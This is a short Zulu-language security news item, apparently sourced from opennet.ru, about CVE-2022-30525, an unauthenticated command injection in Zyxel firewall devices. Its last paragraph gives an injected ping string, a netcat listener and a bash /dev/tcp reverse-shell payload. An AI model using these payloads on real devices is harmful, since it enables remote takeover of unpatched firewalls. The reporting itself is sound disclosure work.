Ukuba sengozini okubalulekile (CVE-2022-30525) kukhonjwe kumadivayisi e-Zyxel ochungechunge lwe-ATP, i-VPN ne-USG FLEX, eklanyelwe ukuhlela ukusebenza kwezicishamlilo, i-IDS ne-VPN emabhizinisini, okuvumela umhlaseli wangaphandle ukuthi akhiphe ikhodi idivayisi ngaphandle kwamalungelo omsebenzisi ngaphandle kokuqinisekisa. Ukuze enze ukuhlasela, umhlaseli kufanele akwazi ukuthumela izicelo kudivayisi esebenzisa iphrothokholi ye-HTTP/HTTPS. I-Zyxel ilungise ukuba sengozini kusibuyekezo se-firmware se-ZLD 5.30. Ngokwenkonzo yakwaShodan, njengamanje kunamadivayisi angaba sengozini ayi-16213 kunethiwekhi yomhlaba wonke amukela izicelo nge-HTTP/HTTPS.
Umsebenzi wenziwa ngokuthumela imiyalo eklanywe ngokukhethekile kusiphathi sewebhu /ztp/cgi-bin/handler, efinyeleleka ngaphandle kokuqinisekisa. Inkinga ibangelwa ukuntuleka kokuhlanza okufanele kwamapharamitha wesicelo lapho kusetshenziswa imiyalo kusistimu kusetshenziswa ikholi ye-os.system esetshenziswa kulabhulali ye-lib_wan_settings.py futhi isetshenziswa lapho kucutshungulwa ukusebenza kwe-setWanPortSt.
Isibonelo, umhlaseli angadlulisa uchungechunge “; ping 192.168.1.210;" okuzoholela ekusetshenzisweni komyalo othi "ping 192.168.1.210" ohlelweni. Ukuze uthole ukufinyelela kugobolondo lomyalo, ungasebenzisa okuthi “nc -lvnp 1270” kusistimu yakho, bese uqala ukuxhumana okuhlanekezelwe ngokuthumela isicelo kudivayisi nge-'; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.
Source: opennet.ru